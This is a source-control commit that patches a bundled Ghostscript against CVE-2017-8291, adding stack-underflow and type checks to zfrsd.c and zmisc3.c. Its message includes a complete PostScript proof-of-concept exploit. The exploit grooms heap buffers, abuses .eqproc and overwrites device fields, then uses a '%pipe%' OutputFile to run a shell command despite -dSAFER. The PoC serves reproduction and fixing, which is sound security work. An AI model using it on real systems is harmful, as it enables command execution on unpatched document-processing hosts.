ref: 0af7d1fe35093690f2d8dd0613b3bf3b777674c6
parent: b767b2ce23ba8294d7e628b7fbcd0ad844be5dc8
author: cinap_lenrek <cinap_lenrek@felloff.net>
date: Fri Jun 21 14:57:20 EDT 2019
gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)
To reproduce:
gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<.
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo gotce)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf
.
--- a/sys/src/cmd/gs/src/zfrsd.c
+++ b/sys/src/cmd/gs/src/zfrsd.c
@@ -47,13 +47,19 @@
ref *pFilter;
ref *pDecodeParms;
int Intent;
- bool AsyncRead;
+ bool AsyncRead = false;
ref empty_array, filter1_array, parms1_array;
uint i;
- int code;
+ int code = 0;
+ if (ref_stack_count(&o_stack) < 1)
+ return_error(e_stackunderflow);
+ if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+ return_error(e_typecheck);
+
make_empty_array(&empty_array, a_readonly);
- if (dict_find_string(op, "Filter", &pFilter) > 0) {+ if (r_has_type(op, t_dictionary)
+ && dict_find_string(op, "Filter", &pFilter) > 0) { if (!r_is_array(pFilter)) {if (!r_has_type(pFilter, t_name))
return_error(e_typecheck);
@@ -92,10 +98,12 @@
return_error(e_typecheck);
}
}
- if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
- (code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
- )
- return code;
+ if (r_has_type(op, t_dictionary))
+ code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+ if (r_has_type(op, t_dictionary))
+ if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+ return code;
push(1);
op[-1] = *pFilter;
if (pDecodeParms)
--- a/sys/src/cmd/gs/src/zmisc3.c
+++ b/sys/src/cmd/gs/src/zmisc3.c
@@ -55,6 +55,12 @@
ref2_t stack[MAX_DEPTH + 1];
ref2_t *top = stack;
+ if (ref_stack_count(&o_stack) < 2)
+ return_error(e_stackunderflow);
+ if (!r_is_array(op - 1) || !r_is_array(op)) {+ return_error(e_typecheck);
+ }
+
make_array(&stack[0].proc1, 0, 1, op - 1);
make_array(&stack[0].proc2, 0, 1, op);
for (;;) {--
⑨